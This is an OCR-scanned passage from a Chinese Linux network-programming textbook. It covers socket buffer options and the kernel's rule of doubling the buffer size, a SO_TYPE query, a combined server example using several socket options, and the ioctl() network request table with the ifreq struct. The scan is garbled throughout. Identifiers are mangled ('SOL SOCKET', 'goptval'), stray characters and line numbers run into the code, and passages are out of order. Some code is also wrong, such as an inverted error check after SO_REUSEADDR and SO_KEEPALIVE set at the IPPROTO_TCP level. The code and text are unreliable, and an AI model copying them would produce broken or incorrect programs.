和 发 送 缓冲 区 的 大 小 ， 并 将 结果 打印 出 来 。 


/* 
* 检查 上 述 缓冲 区 设置 的 情况 
* 获得 修改 后 发 送 缓冲 区 大 小 
2 
optlen = sizeof(snd size); 
err = getsockopt(s, SOL SOCKET, SO _ SNDBUF,&snd size, &optlen); 
if(err){ 
printf ("获取 发 送 缓冲 区 大 小 错误 \n"); 
2 
* 获得 修改 后 接收 缓冲 区 大 小 
x 
optlen = sizeof(rcv size); 
err = getsockopt(s, SOL SOCKET, SO RCVBUF, &rcv_ size, &optlen); 
if(err){ 
printf ("获取 接收 缓冲 区 大 小 错误 \n") ; 
站 
* 打印 结果 
Ee 
printf (" 发 送 缓冲 区 大 小 为 : sd 字 节 \n", snd size); 
printf ("接收 缓冲 区 大 小 为 : sd 字 节 \n", rcv_size); 
close(s); 
return 0; 
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(4) 


} 
编译 并 运行 程序 。 将 上 面 的 代码 保存 并 编译 运行 的 结果 为 : 


发 送 缓冲 区 原始 大 小 为 : 16384 字 节 
接收 缓冲 区 原始 大 小 为 : 0 字 节 
发 送 缓冲 区 大 小 为 : 8192 字 节 
接收 缓冲 区 大 小 为 : 16384 字 节 


上 面 的 运行 结果 可 以 得 出 ， 当 TCP 套 接 字 没有 接收 数据 的 时 候 ， 其 接收 缓冲 区 的 原 
始 大 小 为 0 字 节 ， 发 送 缓冲 区 的 大 小 为 16K 字 节 。 在 设置 缓冲 区 大 小 的 时 候 ， 真 实 的 设置 


从 Jj 


情况 为 月 
3. 


日 户 输入 值 的 2 倍 大 小 。 
缓冲 区 的 内 核 策略 


分 析 程 序 的 运行 结果 ， 似 乎 实际 所 得 的 缓冲 区 大 小 为 设 定 值 的 两 倍 。 分 析 Linux 的 内 
核 源 代码 可 以 清晰 地 获得 其 算法 。 设 置 缓冲 区 大 小 的 内 核 代码 在 文件 net/core/sock.c 中 ， 
不 同 的 内 核 版 本 ， 其 算法 可 能 会 有 差异 。 
(1) 在 内 核 中 设置 发 送 缓冲 区 的 策略 。 下 面 是 设置 发 送 缓冲 区 SO_SNDBUF 的 代码 : 


487 
488 
489 
490 
491 
492 
493 
494 
495 
496 
497 
498 
499 
500 
501 
502 
503 
504 
505 
506 
507 


case SO_SNDBUF: 

/*Don't error on this BSD doesn't and if you think 
about it this is right. Otherwise apps have to 
play 'guess the biggest size' games. RCVBUF/SNDBUF 
are treated in BSD as hints*/ 


if (val > sysctl] wmem max) 
val = sysctl wmem max; 
set_sndbuf: 
Sk->sk_userlocks |= SOCK_SNDBUF _ LOCK; 
if ((val * 2) < SOCK MIN SNDBUF) 
Sk->sk_sndbuf = SOCK MIN_SNDBUF; 
else 
Sk->sk_sndbuf = val * 2; 


/* 

* Wake up sending tasks if we 
* upped the value. 

a 

Sk->sk write space (sk); 

break; 


从 第 487 一 507 行为 设置 发 送 缓 冲 区 的 代码 。 变 量 val 存放 了 用 户 设置 的 缓冲 
对 发 送 缓冲 区 大 小 设置 的 规则 如 下 : 
当 用 户 设置 的 值 比 sysctl wmem max 大 时 ， 将 发 送 缓冲 区 设置 为 sysctL_ 


口 


口 


口 


常量 SOCK MIN SNDBUF 是 最 小 发 送 缓冲 


wmem max。 


区 大 小 。 


当 用 户 设置 值 的 2 倍 比 SOCK MIN SNDBUF 还 要 小 时 ， 将 发 送 缓冲 区 大 小 设置 


为 SOCK MIN SNDBUF 。 
其 他 情况 将 缓冲 区 大 小 设置 为 用 户 设置 缓冲 区 大 小 的 2 倍 。 


缓冲 区 的 值 ， 其 定义 如 下 : 


区 值 ，SOCK_MIN_RCVBUF 是 最 小 接收 


Se 
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#define SOCK MIN SNDBUF 2048 
#define SOCK MIN RCVBUF 256 


变量 sysctl wmem_max 是 在 sk_init() 函 数 中 初始 化 的 ， 其 代码 如 下 所 示 。 当 内 存 比较 
小 的 时 候 ， 它 的 值 为 32K-1(32767); 当 系 统 的 内 存 比较 大 的 时 候 ， 值 为 128K-1(131071)。 


L002 
1103 
1104 
1105 
1106 
1107 
1108 
1109 
1110 


if (num physpages <= 4096) { 
Sysctl wmem max = 32767; 
Sysctl rmem max = 32767; 
Sysctl wmem default = 32767; 
sysctl rmem default = 32767; 

} else if (num physpages >= 131072) { 
SYSct1 wmem max 131071; 
Sysctl rmem max = 131071; 


} 


(2) 在 内 核 中 设置 接收 缓冲 区 的 策略 。 下 面 是 一 段 处 理 设置 SO_RCVBUF 的 代码 : 


516 
517 
518 
S19 
520 
与 2 
22 
2 
524 
人 2 
526 
527 
528 
529 
530 
3 上 
532 
533 
534 
335 
536 
537 
538 
539 
540 
541 
542 
543 
544 
545 


se 


case SO RCVBUF: 
/*Don't error on this BSD doesn't and if you think 
about it this is right. Otherwise apps have to 
Play 'guess the biggest size' games. RCVBUF/SNDBUF 
are treated in BSD as hints*/ 


if (val > sysctl rmem max) 
val = sysctl rmem max; 
Dorevinss 
加 Sk->sk userlocks |= SOCK RCVBUF LOCK; 
/* 
* We double it on the way in to account for 
"struct sk buff" etc. overhead. Applications 
assume that the SO RCVBUF setting they make will 
allow that much actual data to be received on that 
socket. 


other overheads allocate from the receive buffer 
during socket buffer allocation. 


And after considering the possible alternatives, 
returning the value we actually used in getsockopt 
* is the most desirable behavior. 
s/ 
if ((val * 2) < SOCK MIN_ RCVBUF) 
Sk->sk rcvbuf = SOCK MIN RCVBUF; 
else 
Sk->sk_rcvbuf = val * 2; 
break; 


来 
来 
来 
来 
来 
* Applications are unaware that "struct sk buff" and 
来 
来 
* 
来 
* 


从 第 516 一 545 行为 设置 接收 缓冲 区 的 代码 。 变 量 val 存放 了 用 户 设置 的 缓冲 区 大 小 。 
对 接收 缓冲 区 大 小 设置 的 规则 如 下 : 


口 


x 


= 


max。 


户 设置 的 值 比 sysctl wmem_max 大 时 ， 将 发 送 缓冲 区 设置 为 sysctl wmem_ 


户 设置 值 的 2 倍 比 SOCK MIN RCVBUF 还 要 小 时 ， 将 接收 缓冲 区 大 小 设置 


为 SOCK MIN RCVBUF。 


其 人 


也 情况 将 缓冲 区 大 小 设置 为 用 户 设置 缓冲 区 大 小 的 2 倍 。 


12.5.2 ”获取 套 接 字 类 型 的 例子 


下 面 是 一 个 获取 套 接 字 类 型 的 例子 ， 在 建立 一 个 流 式 套 接 字 之 后 ， 使 用 getsockopt0 
函数 的 SO_TYPE 命令 字 ， 获 得 当前 套 接 字 的 类 型 ， 查 看 套 接 字 的 类 型 是 否 符合 建立 套 接 


字 的 类 型 ( 流 式 )。 代 码 如 下 : 


01 #include <stdio.h> 

02 #include <stdlib.h> 

03 #include <unistd.h> 

04 #include <string.h> 

05 #include <errno.h> 

06 #include <sys/types.h> 

07 #include <sys/socket.h> 

08 #include <assert.h> 

09 int main(int argc,char **argv) 


LO 

型 int err = -1; /* 错 误 */ 

2 int s = -1; /*Socket*/ 

13 int so type = -1; /*Socket 类 型 */ 
14 socklen t len = -1; /* 选 项 值 长 度 */ 
hk 

16 s = socket (AF INET,SOCK STREAM,0); /* 建 立 一 个 流 式 套 接 字 */ 
到 if(-1 == s){ 

18 printf ("socket error\n"); 

19 return -1; 

20 } 

21 

ba len = sizeof (so type); 

之 这 err = getsockopt(s, SOL SOCKET, SO TYPE, &so tyPe,&len) : 
24 /* 获 得 SO TYPE 的 值 */ 

je if(err == -1)1{ 

26 printf ("getsockopt error\n"); 

27 close(s); 

28 return -1; 

29 } 

30 /* 输 出 结果 */ 

printf ("socket fd: %d\n",s); 

32 Printf(" SO TYPE : %d\n",so type); 

33 close(s); 

34 return 0; 

35° 


将 上 述 代码 保存 为 sopts_gettype.c， 进 行 编译 : 


$gcc -o sopts_gettype sopts gettype.c 


运行 的 结果 如 下 ， 通 过 结果 可 知 套 接 字 文 件 描述 符 的 值 为 3，SO_TYPE 的 值 为 1。 


#./ sopts gettype 
Socket fd:3 
SO_TYPE:1 


12.5.3 ”使 用 套 接 字 选项 的 综合 例子 


下 面 是 一 个 综合 使 用 套 接 字 选 项 的 例子 ， 在 例子 中 使 用 了 程序 设计 中 经 常用 到 的 套 接 
字 选 项 ， 如 设置 套 接 字 的 缓冲 区 大 小 、 设 置 套 接 字 的 地 址 重用 、 设 置 套 接 字 接 收 数据 的 超 


-a 
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时 时 间 等 。 要 使 用 套 接 字 选项 需要 包含 如 下 的 头 文件 ， 代 码 如 下 : 


01 #include<stdio.h> 

02 #include<stdlib.h> 

03 #include<sys/socket.h> 
04 #include<error.h> 

05 #include<string.h> 

06 #include<sys/types.h> 
07 #include<netinet/in.h> 
08 #include<netinet/tcp.h> 
09 #include<sys/wait.h> 
10 #include<arpa/inet.h> 
11 #include<unistd.h> 


1. 处 理 SIGPIP 和 SIGINT 信号 的 函数 sigpipe() 

sigpipe() 函 数 用 于 截取 信号 SIGPIPE 和 信号 SIGINT。 当 客户 端的 连接 断 开 的 时 候 ， 服 
务 器 端的 socket 连接 会 接收 到 一 个 SIGPIPE 的 信和 号, 通知 客户 端 被 断 开 。 当 用 户 按 Ctrl+C 
键 的 时 候 会 向 进程 发 送 SIGINT 信和 号， 通知 进程 被 打 断 。 当 收 到 SIGPIPE 和 SIGINT 信号 
的 时 候 会 设置 全 局 变量 alive， 循 环 的 主 程序 会 自动 退出 。 

12 ”/* 用 于 处 理 SIGPIP 和 SIGINT 信号 的 函数 */ 


13 static int alive = 1; /* 是 否 退 出 */ 

14 static void sigpipe(int signo) 

LS A{ 

16 alive = 0; 

Ek 

2. 服务 器 参数 

服务 器 在 端口 8888 侦 听 ， 最 大 的 排队 队列 长 度 为 8。 

18 #define PORT 8888 /* 服 务 器 侦 听 端口 为 8888*/ 
19 #define BACKLOG 8 /* 最 大 侦 听 排队 数量 为 8*/ 


3. 主 程序 初始 化 部 分 


以 下 为 主 程序 的 初始 化 部 分 代码 ,声明 了 一 些 参数 便于 以 后 使 用 , 并 且 调用 函数 signal() 
截取 SIGPIPE 和 SIGINT 信号， 由 函数 signo() 处 理 。 


20 int main(int argc, char *argv[]) 


2 

2 /xs 为 服务 器 的 侦 听 套 接 字 描 述 符 , sc 为 客户 端 连接 成 功 返 回 的 描述 符 */ 
23 nea ge 

24 /*1local_addr 本 地 地 址 , client_addr 客户 端的 地 址 */ 

25 struct sockaddr in local addr,client addr; 

26 int err = <=] /* 错 误 返 回 值 */ 

2 socklen t optlen = -1; /* 整 型 的 选项 类 型 值 */ 
28 int optval = -1; /* 选 项 类 型 值 长 度 */ 
29 /* 截 取 SIGPIPE 和 SIGINT 由 函数 sigpipe 处 理 */ 

30 signal (SIGPIPE, sigpipe); 

J signal (SIGINT, sigpipe); 


.354 。 


4. 主 函 数 的 套 接 字 建立 


先 创建 一 个 流 式 套 接 字 描述 符 s， 然 后 使 用 套 接 字 选 项 SO_REUSEADDR， 将 这 个 套 
接 字 设 置 为 地 址 可 复 用 。 
32 /* 创 建 本 地 监听 套 接 字 */ 


区 S = socket(AF INET,SOCK STREAM,0); 

34 if( s == -1){ 

35 printf (" 套 接 字 创 建 失败 !\n"); 

36 return -1; 

37 

38 /* 设 置地 址 和 端口 重用 */ 

39 optval = 1; /* 重 用 有 效 */ 
40 optlen = sizeof (optval); 

41 err=setsockopt (s, SOL_ SOCKET, SO REUSEADDR, (char *) goptval, optlen); 
42 if(err!= -1){ /* 设 置 失败 */ 
43 printf(" 套 接 字 可 重用 设置 失败 !\n") ; 

44 return -1; 

45 } 


5. 主 函数 的 地 址 绑 定 


初始 化 本 地 的 参数 ， 注 意 ， 一 定 要 在 使 用 之 前 对 参数 进行 设置 ， 例 如 ， 使 用 bzero 对 
结构 struct sockaddr in 类 型 的 变量 local_addr 进行 初始 化 。 


46 /* 初 始 化 本 地 协议 族 , 端口 和 IP 地址 */ 


47 bzero(&local addr, sizeof (local addr)); /* 清 理 */ 
48 local addr.sin family=AF INET; /* 协 议 族 */ 
49 local addr.sin port=htons (PORT); /* 端 口 */ 
50 local addr.sin addr.s addr=INADDR ANY; /* 任 意 本 地 地 址 */ 
绑 定 套 接 字 ，bind() 函 数 一 般 不 会 出 错 ， 但 是 也 应 该 进行 判断 。 
5 /* 绑 定 套 接 字 */ 
52 err =bind(s，(struct sockaddr *) glocal addr, sizeof(struct sockaddr) ) 
53 if(err == =1){ /* 绑 定 失败 */ 
54 Printf (" 绑 定 失败 !\n") ; 
S55 return -1; 
56 
修改 套 接 字 缓 冲 区 大 小 


为 了 提高 发 送 和 接收 的 性 能 ， 经 常 使 用 套 接 字 SO_RCVBUF 和 SO_SNDBUF 选项 修 
改 缓冲 区 的 大 小 ， 这 里 将 缓冲 区 的 大 小 设置 为 128K 字 节 。 
57 /* 设 置 最 大 接收 缓冲 区 和 最 大 发 送 缓冲 区 */ 


58 optval = 128*1024; /* 缓 冲 区 大 小 为 128Kx / 

59 optlen = sizeof (optval); 

60 err = setsockopt(s, SOL SOCKET, SO RCVBUF, &optval, optlen); 
61 if(err == -1)1{ /* 设 置 接收 缓冲 区 大 小 失败 */ 
62 printf ("设置 接收 缓冲 区 失败 \n"); 

63 4 

64 err = setsockopt(s, SOL SOCKET, SO SNDBUF, goptval, optlen); 
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65 if(err == -1){ /* 设 置 发 送 缓冲 区 大 小 失败 */ 
66 printf ("设置 发 送 缓冲 区 失败 \n"); 
67 


7. 修改 收发 的 超时 时 间 


为 了 在 接收 和 发 送 的 时 候 省 略 select 的 调用 ， 使 用 套 接 字 选项 SO_RCVTIMEO 和 
SO_SNDTIMEO 对 接收 超时 时 间 和 发 送 超时 时 间 进 行 一 次 设置 ， 在 使 用 的 过 程 中 ， 后 面 不 
用 再 次 进行 判断 是 否 超时 。 当 为 0 时 ， 表 示 永 不 超时 。 

68 /* 设 置 发 送 和 接收 超时 时 间 */ 


69 struct timeval tv; 

70 tv tr Bec w 1 /*1ls*/ 

7 tv.tv usec = 200000; /*200ms*/ 

72 optlen = sizeof (tv); 

人 err = setsockopt(s, SOL SOCKET, SO RCVTIMEO, &tv, optlen); 
74 /* 设 置 接收 超时 时 间 */ 
75 if(err == /* 设 置 接收 超时 时 间 失 败 */ 
76 i * 必 和 接收 超时 时 间 失败 Vn" 于 

EY 1! 

78 err = setsockopt(s, SOL SOCKET, SO SNDTIMEO, &tv, optlen); 
79 人 全 / 

80 if(err == -1) 

81 printf(" 设置 发 送 超时 时 间 失败 vv ; ; 

82 } 


8. 设置 服务 器 侦 听 队列 长 度 
将 监听 队列 长 度 设 置 为 8。 


83 /* 设 置 监听 * / 

84 err = listen(s,BRCKLOG) 

85 if( err ==-1){ /* 设 置 监听 失败 */ 
86 printf ("设置 监听 失败 !\n"); 

87 return -1; 

88 } 


9. 设置 accept 超时 时 间 
以 下 代码 为 主 处 理 过 程 ， 先 初始 化 对 非 阻塞 accept 侦 听 的 超时 时 间 为 200ms。 


89 printf ("等 待 连接 ...\n")， 

90 fd set fd r; /* 读 文件 描述 符 集 */ 
91 tv.tv usec = 200000; /* 超 时 时 间 为 200ms*/ 
92 tv.tv sec = 0; 

93 while(alive){ 

94 // 有 连接 请 求 时 进行 连接 

95 socklen t sin size=sizeof(struct sockaddr in); 


10. select() 函 数 轮 询 客户 端 连接 


select() 函 数 进行 accept 是 否 有 客户 连接 到 来 的 轮 询 , 和 否则 程序 有 可 能 会 在 这 里 阻塞 ， 
当 没 有 客户 端 到 来 的 时 候 ， 用 户 层 不 能 进行 处 理 。 
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96 /* 此 处 每 次 会 轮 询 是 否 有 客户 端 连 接 到 来 ,间隔 时 间 为 200ms*/ 
97 FED_ZERO(&fd_r) ; /* 清 除 文件 描述 符 集 */ 
98 FD SET(s, &fd r); /* 将 侦 听 描述 符 放 入 */ 
99 Switch (select(s + 1, &fd r, NULL,NULL, &tv)) { 
/* 监 视 文件 描述 符 集 fd_r*/ 
100 case -1: /* 错 误 发 生 */ 
101 case 0: /* 超 时 */ 
102 continue; 
103 break; 
104 default: /* 有 连接 到 来 */ 
105 break; 
106 } 
107 /* 有 连接 到 来 ,接收 . . .*/ 
108 sc = accept(s, (struct sockaddr *) gclient addr,g&sin size) 
109 a re = 失败 2 
110 perror ("接受 连接 失败 !\n"); 
hh continue; 
112 } 


11. 设置 客户 端的 超时 探测 时 间 
设置 客户 端 套 接 字 描述 的 连接 探测 超时 时 间 为 10s。 
EE /* 设 置 连接 探测 超时 时 间 */ 


114 optval = 10; /*10s*/ 

3 optlen = sizeof (optval); 

116 err = setsockopt (sc, IPPROTO TCP, SO KEEPALIVE, (char*) goptval, optlen); 
a /* 设 置 失败 */ 

118 if( err == -1){ /* 失 败 */ 

119 printf ("设置 连接 探测 间隔 时 间 失 败 \n") ; 

120 } 


12. 禁止 Nagle 算法 
禁止 Nagle 算法 ， 不 对 发 送 数 据 进 行 缓冲 ， 使 得 发 送 数 据 立 刻 有 效 。 
ne /x* 设 置 禁止 Nagle 算法 */ 


122 optval = 1; /* 禁 止 */ 

123 optlen = sizeof (optval); 

124 err = setsockopt (sc, IPPROTO TCP, TCP NODELAY, (char*) goptval, optlen); 
125 /* 设 置 失败 */ 

126 if( err == -1){ We 

2 printf ("禁止 Nagle 算法 失败 \n"); 

128 } 


13. 设置 linger 

将 连接 关闭 设置 为 立即 关闭 ， 当 调用 close() 函 数 的 时 候 ， 立 即 关 闭 连接 ， 并 将 发 送 组 
冲 区 内 的 未 决 数据 清空 。 将 struct linger 类 型 变量 linger 的 1_ono 企 成 员 设 置 为 1， 表示 延迟 
关闭 生效 ;将 成 员 1 linger 设置 为 0， 表示 立即 关闭 。 

129 /* 设 置 连接 延迟 关闭 为 立即 关闭 */ 


人 struct linger linger; 
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linger.1 onoff = 1; /* 延 迟 关 闭 生 效 */ 
linger.1 linger = 0; /* 立 即 关 闭 */ 
optlen = sizeof (linger); 
err = setsockopt (sc, SOL SOCKET, SO LINGER, (char*) glinger, optlen); 
/* 设 置 失败 */ 
TE ers Tt /* 失 败 #/ 
printf ("设置 立即 关闭 失败 \n") ; 


14. 输出 客户 端的 信息 
打印 客户 端 连接 的 地 址 ， 并 向 客户 端 发 送 连接 成 功 的 字符 串 。 


139 /* 打 印 客户 端 IP 地 址 信息 */ 

140 Printf (" 接 到 一 个 来 自 %s 的 连接 \n" , inet ntoa(client addr.sin addr)); 
141 err = send (sc "连接 成 功 !\n",10,0); 
142 ES == 1){ 

143 printf ("发 送 通 知 信息 失 败 ! \n")， 
144 } 

15. 关闭 客户 端 

关闭 客户 端 ， 此 时 未 发 出 的 数据 将 被 清空 。 

145 /* 关 闭 客户 端 连接 */ 

146 Close(sc) : 

147 

148 } 


16. 关闭 服务 器 端 


149 
150 
下 5S 


当 接 收 到 信号 SIGINT 或 者 信号 SIGPIPE 后 代码 会 执行 到 这 里 ， 关 闭 服务 器 并 退出 。 
/* 关 闭 服 务 器 端 */ 
close(s); 
return 0; 


下 5 多 
L153 


12.6 ”ioctl0 遂 数 


ioctl0 函 数 在 前 面 已 经 介绍 过 , 是 Linux 下 面 与 内 核 交 互 的 一 种 方法 ,网 络 程序 设计 中 


广泛 地 使 用 了 ioctl0) 函 数 与 内 核 中 的 网 络 协 议 栈 进行 交互 。 其 函数 原型 为 : 
int ioctl(int dr Ant reqesty -ys 
12.6.1 ioctl() 函 数 的 命令 选项 


ioctI(0 函 数 的 选项 众多 ， 与 网 络 相关 的 选项 总 结 为 表 12.3 所 示 的 儿 类 ， 主 要 包含 对 套 
接 字 、 文 件 、 网 络 接口 、 地 址 解析 协议 CARP) 和 路 由 等 的 操作 请 求 。 
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表 12.3 与 网 络 相关 的 ioctl() 请 求 命令 


类 型 请 求 含义 数据 类 型 

SIOCATMARK 表示 是 否 带 外 数据 int 

六 SIOCSPGRP 表示 设置 套 接 字 的 进程 ID int 
SIOCGPGRP 表示 获得 套 接 字 的 进行 ID int 
FIOSETOWN 表示 设置 文件 所 属 的 进程 ID int 

证 FIOGETOWN 表示 获得 文件 所 属 的 进程 ID int 
SIOCGSTAMP 表示 获得 时 间 戳 struct timeval 
FIONBIO 表示 设置 或 者 取消 非 阻塞 标记 int 

文件 FIOASYNC 表示 设置 或 者 取消 异步 IO 标志 int 
FIONREAD 表示 获得 接收 缓冲 区 内 的 字 节 数 int 
SIOCGIFNAME 表示 获得 网 络 接口 名 称 struct ifreq 
SIOCSIFLINK 表示 设置 网 络 接口 频道 struct ifreq 
SIOCGIFCONF 表示 获得 网 络 接口 列表 struct ifconf 
SIOCGIFFLAGS 表示 获得 网 络 接口 标志 struct ifreq 
SIOCSIFFLAGS 表示 设置 网 络 接口 标志 struct ifreq 
SIOCGIFADDR 表示 获得 网 络 接口 IP 地 址 struct ifreq 
SIOCSIFADDR 表示 设置 网 络 接口 IP 地址 struct ifreq 
SIOCGIFDSTADDR 表示 获得 目的 地 址 struct ifreq 
SIOCSIFDSTADDR 表示 设置 目的 地 址 struct ifreq 
SIOCGIFBRDADDR 表示 获得 广播 的 目的 地 址 struct ifreq 
SIOCSIFBRDADDR 表示 设置 广播 的 目的 地 址 struct ifreq 
SIOCGIFNETMASK 表示 获得 网 络 的 子 网 掩 码 struct ifreq 
SIOCSIFNETMASK 表示 设置 网 络 的 子 网 掩 码 struct ifreq 

网 络 接口 SIOCGIFMETRIC 妆 四 奖 得 Metric struct ifreq 
SIOCSIFMETRIC 表示 设置 Metric struct ifreq 
SIOCGIFMEM 表示 获得 内 存 地址 struct ifreq 
SIOCSIFMEM 表示 设置 内 存 地址 struct ifreq 
SIOCGIFMTU 表示 获得 MTU 尺寸 struct ifreq 
SIOCSIFMTU 表示 设置 MTU 尺寸 struct ifreq 
SIOCSIFNAME 表示 设置 网 络 接 口 名 称 struct ifreq 
SIOCSIFHWADDR 表示 设置 硬件 地 址 struct ifreq 
SIOCGIFHWADDR 表示 获得 硬件 地 址 struct ifreq 
SIOCGIFSLAVE 表示 获得 驱动 slave 支持 struct ifreq 
SIOCSIFSLAVE 表示 设置 驱动 slave 支持 struct ifreq 
SIOCADDMULTI 表示 获得 多 播 地 址 struct ifreq 
SIOCDELMULTI 表示 设置 多 播 地址 struct ifreq 
SIOCGIFINDEX 表示 获得 名 称 / 网 络 接口 映射 struct ifreq 
SIOCSIFPFLAGS 表示 设置 网 络 标志 扩展 struct ifreq 


“Ye 


第 2 篇 ”Linux 用 户 层 网 络 编程 
类 型 请 求 含义 数据 类 型 
SIOCGIFPFLAGS 表示 获得 网 络 标志 扩展 struct ifreq 
SIOCSIFHWBROADCAST | 表示 设置 硬件 广播 地 址 struct ifreq 
网 络 接口 SIOCGIFTXQLEN 表示 获得 发 送 队 列 长 度 struct ifreq 
SIOCSIFTXQLEN 表示 设置 发 送 队 列 长 度 struct ifreq 
SIOCGIFMAP 表示 获得 网 络 设备 地 址 映射 空间 struct ifreq 
SIOCSIFMAP 表示 设置 网 络 设备 地 址 映射 空间 struct ifreq 
SIOCSARP 表示 设置 ARP 项 struct arpreq 
ARP SIOCGARP 表示 获得 ARP 项 struct arpreq 
SIOCDARP 表示 删除 ARP 项 struct arpreq 
路 由 SIOCADDRT 表示 增加 路 径 struct rtentr 
SIOCDELRT 表示 删除 路 径 struct rtentr 
12.6.2 ioctl() 函 数 的 IO 请 求 


套 接 字 IO 操作 的 命令 请 求 有 6 个 ， 它 们 的 第 3 个 参数 要 求 为 一 个 执行 整 型 数据 的 指 
针 。 其 含义 如 下 所 述 。 

口 SIOCATMARK: 查看 TCP 连接 中 是 否 有 带 外 数据 ， 如 果 有 带 外 数据 ， 第 3 个 指 
针 的 返回 值 为 非 0， 和 否则 为 0。 带 外 数据 在 第 11 章 中 有 介绍 。 

口 SIOCSPGRP 和 FIOSETOWN: 这 两 个 请 求 可 以 获得 对 套 接 字 的 SIGIO 和 SIGURG 
信号 ， 进 行 处 理 的 进程 ID 号 或 者 进程 组 ID 号 ， 通 过 第 3 个 参数 获得 。 

口 SIOCGPGRP 和 FIOGETOWN: 利用 第 3 个 参数 ， 这 两 个 请 求 可 以 设置 接收 此 套 
接 字 的 SIGIO 和 SIGURG 信和 号 的 进程 ID 或 者 进程 组 ID。 

口 SIOCGSTAMP: 利用 这 个 请 求 可 以 得 到 最 后 一 个 数据 报 文 到 达 的 时 间 ， 第 3 个 参 
数 是 一 个 指向 结构 struct timeval 的 指针 。 


下 面 的 代码 为 以 上 6 个 请 求 的 使 用 方法 。 变 量 s 为 socket() 的 描述 符 ，request 为 用 户 


的 请 求 类 型 ，para 和 tv 分 别 用 于 ioctl0 函 数 的 第 3 个 参数 。 
int main(void) 
i 
he Ey /*socket 描述 符 */ 
int err = -1; /* 返 回 值 */ 
int request = -1; /* 请 求 类 型 */ 


/*ioct1l 第 3 个 参数 */ 
/*ioctl 第 3 个 参数 */ 


int para = 一 7 
struct timeval tv; 


1. 命令 SIOCATMARK 的 使 用 
对 有 无 带 外 数据 的 判断 是 ， 当 para 为 0 时 表示 无 带 外 数据 ， 非 0 时 表示 有 带 外 数据 


“2 


到 来 。 


request = SIOCRTMRRK 
err = ioctll(s, request, é&para); 


if (err){ /*ioctl () 函数 出 错 */ 
/# 错 误 处 理 */ 

} 

if (para) { /* 有 带 外 数据 */ 


/+ 接收 带 外 数据 , 处 理 . . .*/ 
人 /* 无 带 外 数据 +/ 
I 

2. 命令 SIOCGPGRP 和 FIOGETOWN 的 使 用 


获得 SIGIO 和 SIGURG 信和 号 处 理 进 程 ID ，para 参数 保存 的 为 进程 的 ID 号, 请求 的 类 
型 可 以 为 SIOCGPGRP 或 者 FIOGETOWN。 


request = SIOCGPGRP; /* 或 者 FIOGETOWN*/ 

err = ioctll(s, request, é&para); 

if(err) { /*ioct1l () 函数 出 错 */ 
/* 错 误 处 理 #/ 

Pee 


/* 获 得 了 处 理 信号 的 进程 ID 号 */ 


3. 命令 SIOCSPGRP 和 FIOSETOWN 的 使 用 


设置 SIGIO 和 SIGURG 信号 处 理 进程 ID ， 请 求 类 型 可 以 为 SIOCSPGRP 或 者 
FIOSETOWN，para 中 为 可 以 处 理 信号 的 进程 ID。 


request = SIOCSPGRP; /*FIOSETOWN*/ 

err = ioctl(s, request, &para); 

if (err){ /*ioct1 () 函数 出 错 */ 
/* 错 误 处 理 */ 

}elsel{ 


/* 成 功 设置 了 处 理 信号 的 进程 ID 号 */ 


4. 命令 SIOCGSTAMP 的 使 用 
获得 数据 报 文 到 达 的 时 间 ， 请 求 类 型 为 SIOCGSTAMP， 第 3 个 参数 为 一 个 指向 结构 
struct timeval 的 指针 。 


request = SIOCGSTRMP 
err = ioctll(s, request, &tv); 


if(err){ /*ioct1l1() 函数 出 错 */ 
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/# 错 误 处 理 */ 


ene 


/* 获 得 了 最 后 数据 报 文 到 达 时 间 , 在 参数 tv 内 */ 


} 


12.6.3 ioctl() 函 数 的 文件 请 求 


这 一 组 的 请 求 命令 都 是 FIOxxx 类 型 ， 以 FIO 开头 ， 除 了 可 以 处 理 套 接 字 外 ， 对 通用 
的 文件 系统 也 同样 适用 。 本 组 有 3 个 ， 其 含义 如 下 所 述 。 

口 FIONBIO: 用 于 设置 或 者 清除 套 接 字 的 非 阻塞 (xxxNBxxx-NonBlock) 标志 。 当 
第 3 个 参数 为 0 时 ， 清 除非 阻塞 标志 ， 即 设置 套 接 字 操 作为 阻塞 方式 ， 当 第 3 个 
参数 为 非 0 时， 设置 为 非 阻塞 方式 。 

口 FIOASYNC: 用 于 设置 或 者 清除 套 接 字 的 异步 信号 (SIGIO) 。 当 第 3 个 参数 为 0 
时 ， 清 除 套 接 字 上 的 异步 信号 ; 当 第 3 个 参数 为 非 0 时 ， 设 置 套 接 字 上 的 异步 

口 FIONREAD: 这 个 套 接 字 用 于 获得 当前 套 接 字 接收 缓冲 区 中 的 字 节 数 ， 即 有 多 少 
个 字 节 的 数据 可 以 读 取 ， 提 前 获得 接收 缓冲 区 的 数据 长 度 可 以 正确 地 准备 应 用 层 
用 于 接收 的 缓冲 区 大 小 。 


12.6.4 ioctl() 函 数 的 网 络 接口 请 求 


网 络 接口 的 一 些 参数 ， 例 如 卫 地址 、 子 网 拖 码 、 网 络 接口 名 称 、 最 大 传输 单元 等 是 进 
行 网 络 设置 或 者 网 络 程序 设计 的 时 候 必 须 获得 的 参数 本 小 节 将 介绍 如 何 获得 上 述 的 参数 。 


1. 网 络 接口 的 常用 数据 结构 
使 用 ioctl0) 的 网 络 接口 请 求 命令 ， 需 要 对 如 下 的 结构 进行 填写 获得 读 取 。 


/* 网 络 接口 请 求 结构 */ 
struct ifreq 
{ 
#define IFHWADDRLEN 6 /* 网 络 接 口 硬件 结构 长 度 , 即 MAC 长 度 , 为 6*/ 
union 
{ 
char ifrn name[IFNAMSIZ]; /* 网 络 接口 名 称 ,例如 "eth0"*/ 
} ifr ifrn; 
union { 
struct sockaddr ifru addr; /* 本 地 IP 地 址 */ 
struct sockaddr ifru dstaddr; /* 目 标 IP 地 址 */ 
struct sockaddr ifru broadaddr; /* 广 播 IP 地 址 */ 
struct sockaddr ifru netmask; /* 本 地 子 网 掩 码 地 址 */ 
struct sockaddr ifru hwaddr; /* 本 地 MAC 地 址 */ 
short ifru flags; /* 网 络 接口 标记 */ 
int ifru ivalue; /* 值 , 不同 的 请 求 含义 不 同 */ 
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int ifru mtu; /* 最 大 传输 单元 MTU*/ 

struct ifmap ifru map; /* 网 卡 地 址 映射 */ 

char ifru slave[IFNAMSIZ]; /* 占 位 符 #/ 

char ifru newname[IFNAMSIZ]; /* 新 名 称 */ 

void user +* ifru data; /# 用 户 数据 */ 

struct if settings ifru settings; /* 设 备 协 议 设 置 */ 

} ifr ifru; 

Li 
#define ifr name ifr ifrn.ifrn name /* 接 口 名 称 */ 
#define ifr hwaddr ifr ifru.ifru hwaddr /*MAC 地 址 */ 
#define ifr addr ifr ifru.ifru addr /* 本 地 IP 地 址 */ 
#define ifr dstaddr ifr ifru.ifru dstaddr /*p2p 地 址 */ 
